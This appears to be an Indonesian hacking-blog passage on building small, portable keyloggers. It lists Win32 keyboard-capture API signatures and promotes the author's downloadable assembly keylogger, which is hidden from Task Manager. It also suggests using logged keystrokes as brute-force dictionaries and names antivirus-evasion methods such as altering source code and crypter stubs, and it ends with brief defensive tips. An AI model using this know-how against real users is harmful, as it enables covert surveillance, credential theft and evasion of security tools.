Key Logger harus bisa disalin dan dijalankan pada komputer berbeda tanpa memerlukan installasi yang rumit dan minimum requirement yang berbelit-belit. Sebagai contoh : Program yang ditulis dengan menggunakan MS Visual Basic sebagian besar bergantung pada MSVBVM.DLL, jika pada komputer korban tidak terdapat MSVBVM.DLL maka Key Logger tidak akan dapat dijalankan!!!
Apa ya solusi yang tepat? Oya, bagaimana jika meminta korban untuk mendownload file MSVBVM.DLL serta menjelaskan kepada korban bahwa di komputernya terdapat Key Logger milik Anda yang tidak akan bisa dijalankan tanpa mendownload file tersebut? Solusi GILA tersebut tentu akan membuat mata Anda lebam 3 hari 3 malam karena terkena tendangan maut dari korban yang tidak terima komputernya disusupi oleh Key Logger Anda.
Bagaimana dengan solusi attachment? Solusi menyisipkan MSVBVM.DLL di dalam Key Logger juga adalah sebuah solusi yang GILA karena akan mengakibatkan size Key Logger bertambah besar! Solusi yang tepat adalah kode optimisasi atau pergunakan bahasa pemrograman yang fleksibel, misal Assembly.

SOME USEFUL APIS
Berikut ini Saya lampirkan Referensi Programmer untuk Microsoft Win32 mengenai beberapa fungsi API utama yang sering dipergunakan dalam pemrograman Key Logger :
Hooks (Referensi user32.dll)
Hook adalah suatu point dalam mekanisme penanganan-pesan Microsoft® Windows® di mana sebuah aplikasi dapat menginstal suatu subroutine untuk memonitor lalu-lintas pesan di dalam sistem dan memproses jenis tertentu dari pesan-pesan sebelum menjangkau prosedur jendela target. Untuk mempelajari lebih lanjut, silahkan Anda membaca artikel Saya yang berjudul “Menembus proteksi Password dan Serial Number pada program dengan trik Win32 Hook”
RegisterHotKey (Referensi user32.dll)
Fungsi RegisterHotKey menggambarkan suatu kunci untuk menyisipkan thread.
BOOL RegisterHotKey(
HWND hWnd, // window to receive hot-key notification
int id, // identifier of hot key
UINT fsModifiers, // key-modifier flags
UINT vk // virtual-key code
);
GetMessage (Referensi user32.dll)
Fungsi GetMessage mengambil kembali sebuah pesan dari antrian thread pemanggilan pesan dan menempatkannya di struktur yang ditetapkan. Fungsi Ini dapat mengambil kembali kedua pesan yang berhubungan dengan jendela yang ditetapkan dan thread mengeposkan pesan-pesan melalui fungsi PostThreadMessage. Fungsi mengambil kembali pesan-pesan yang berada di dalam cakupan yang ditetapkan dari nilai pesan. GetMessage tidak mengambil kembali pesan untuk jendela yang dimiliki oleh thread atau aplikasi lain.
BOOL GetMessage(
LPMSG lpMsg, // address of structure with message
HWND hWnd, // handle of window
UINT wMsgFilterMin, // first message
UINT wMsgFilterMax // last message
);
GetKeyboardState (Referensi user32.dll)
Fungsi GetKeyboardState menyalin status 256 tombol virtual ke buffer yang ditetapkan.
BOOL GetKeyboardState(
PBYTE lpKeyState // address of array to receive status data
);
GetKeyNameText (Referensi user32.dll)
Fungsi GetKeyNameText mengambil kembali sebuah string yang menampilkan nama dari sebuah key.
int GetKeyNameText(
LONG lParam, // second parameter of keyboard message
LPTSTR lpString, // address of buffer for key name
int nSize // maximum length of key-name string length
);
GetKeyState (Referensi user32.dll)
Fungsi GetKeyState mengambil kembali status dari kunci virtual yang ditetapkan. Status tersebut menetapkan apakah kunci up, down, atau toggle (on, off ¾ bertukar-tukar setiap kali kunci ditekan).
SHORT GetKeyState(
int nVirtKey // virtual-key code
);
GetAsyncKeyState (Referensi user32.dll)
Fungsi GetAsyncKeyState menentukan apakah suatu kunci up atau down pada saat fungsi dipanggil, dan apakah kunci ditekan setelah pemanggilan sebelumnya ke GetAsyncKeyState.
SHORT GetAsyncKeyState(
int vKey // virtual-key code
);

PROOF OF CONCEPT
MRHPx Key Logger v1.8 (PUBLIC VERSION) mungkin adalah Key Logger terkecil di dunia, dengan size hanya sebesar 10.5 KB (10,752 bytes) tanpa kompresi! :) Untuk mendapatkannya Anda bisa mendowloadnya di website Saya. Jalankan file “MRHPx-Key-Logger.exe” dengan cara klik ganda dengan mouse. Key Logger akan menciptakan LOG file dengan nama “MRHPx-KeyLogger-v1.8-PUBLICVERSION-Log.txt” pada lokasi direktori yang sama dengan tempat executable berada.

Binus Hacker Keylogger
Screenshot 1. Applications Tab Task Manager

Saya menggunakan bahasa pemrograman Assembly 32 bit (bukan Assembly 16 bit yang sudah ketinggalan jaman) untuk coding Key Logger ini. Assembly 32 bit setara dengan C/C++, Delphi, VB, kelebihan lainnya adalah lebih cepat. Ingat, Key Logger ini tidak terlihat pada Applications Tab Task Manager, tidak memiliki GUI (User Interface) apalagi sampai warna-warni seperti bendera partai pada saat pemilu. Konsep Saya adalah membuat Key Logger dengan resource minimalis tapi powerful bak PANAH DEWA seperti rootkit SWISS ARMY KNIFE lainnya yang berjalan secara background..

Keylogger
Screenshot 2. LOG file

Selanjutnya silahkan Anda mengetik apapun dengan menggunakan keyboard hardware ataupun virtual keyboard. Aplikasi apapun yang Anda pergunakan untuk mengetik data akan tersimpan dengan baik pada LOG file secara terpisah. LOG file akan menyimpan data secara berkala setiap kali aplikasi baru dijalankan. Untuk membaca LOG file Anda tidak perlu keluar dari aplikasi karena Saya tidak men-setting batasan hak akses file user. Bagi Anda yang ingin mengetahui lebih lanjut beberapa fitur yang lain silahkan Anda membaca file “BACA_AKU.txt” yang disertakan. Untuk keluar dari aplikasi Key Logger silahkan tekan secara bersamaan tombol “CTRL+ALT+P” pada Keyboard Anda.

FINAL NOTES
Key Logger sangat berbahaya jika dipergunakan sebagai alat kejahatan. Sepintas memang terlihat sepele, karena pada umumnya data yang tersimpan di dalam LOG file cukup acak (CATATAN: beberapa Shareware Key Logger di internet memiliki LOG file yang sangat amburadul karena dibuat secara asal oleh coder BEGO dan MATRE). Namun apa yang terjadi jika data LOG file tersebut dipergunakan sebagai Dictionary Bruteforce dengan bantuan tool seperti John the Ripper dan lainnya??? Untuk memperoleh informasi username dan password korban, data yang semula acak dan sepele akan menjadi dictionary efektif dan bisa dipergunakan sebagai akses login hanya dalam hitungan menit.
Contoh lain adalah jika Anda seorang guru atau dosen dan memiliki siswa yang ternyata seorang hacker (Maksud Saya Cracker), bukan tidak mungkin siswa Anda akan selalu mendapatkan nilai terbaik pada saat ujian karena siswa Anda memasang Key Logger di laptop yang Anda pergunakan untuk menyusun naskah ujian. Tanpa perlu belajar keras, cukup membaca naskah ujian yang telah dicuri oleh Key Logger, siswa Anda akan terlihat menyamai kepintaran Bapak Habibie dalam mengerjakan ujian keesokan harinya :)
Mengerikan bukan? Namun jangan kuatir karena ada cara sederhana dan efektif untuk mencegah komputer Anda disusupi oleh Key Logger yaitu dengan mengaktifkan User Account Control (UAC), memeriksa Registry Autorun dan Service Startup Windows serta memeriksa aplikasi yang berjalan secara background dan terlihat mencurigakan di komputer Anda.
Untuk metode lain, seperti heuristic detection antivirus, firewall dan sebagainya, sepengetahuan Saya hal tersebut kurang efektif. Karena hacker tidak memerlukan waktu yang lama mensiasati deteksi Antivirus yang hampir selalu berdasarkan pada algoritma signature (TradeMark virus). Hanya dengan merubah beberapa baris kode yang terdapat pada source code, maka Hack Tool tidak akan terdeteksi lagi oleh Antivirus. Efektifitas signature yang terdapat dalam database antivirus hanyalah untuk Hack Tool yang dirilis secara PUBLIC VERSION bukan PRIVATE VERSION. Metode lain sebagai alternatif yang cepat dan mudah yang sering dipilih oleh hacker untuk melewati deteksi Antivirus yaitu dengan menggunakan Stub UD atau Stub Commercial Protector. Semoga artikel ini bermanfaat dan dapat membantu Anda mengamankan diri dari kejahatan cyber. NB : untuk orang-orang gak tahu malu, gak ada keinginan belajar, sukanya gratisan, pengennya langsung pakai, yang hobi request crack, hack tool, cheat game online, hack facebook, hack website dan lainnya melalui email Saya, kalian gak ada kerjaan lain apa??? Kenapa gak sekalian aja minta nomer PIN BCA, Account Paypal, Credit Card, tunjangan sosial dan uang di dompet Saya???

Download Keylogger
CONTACT ADDRESS
Website : www.mrhpx.co.nr
Mirror : www.mrhpx.astalavista.ms
Email : mrhpx[@]yahoo.com / nemesisbyte[@]yahoo.com / mrhpx[@]binushacker.org
Facebook : www.facebook.com/mrhpx (Kirim pesan dulu baru Add, menghindari SPAMMERS!)

THANX TO :
My Family.. My Love.. My Cats.. My God and Prophet.. Astalavista.. 0Day.. All friends who help Me a lot until this day in IRiS, LUCiFER, BlackStorm, Kocok Jaya, Ansav, BinusHacker, iRC, uCF, dT, AGAiN, AiR, LZ0, FOSi, ASSiGN, DVT, 29A, TSRh, tPORT, FFF.. All Indonesia veteran haxx0r.. Underground communities.. “Knowledge is Ability, Knowledge mean Glory, Knowledge for Charity”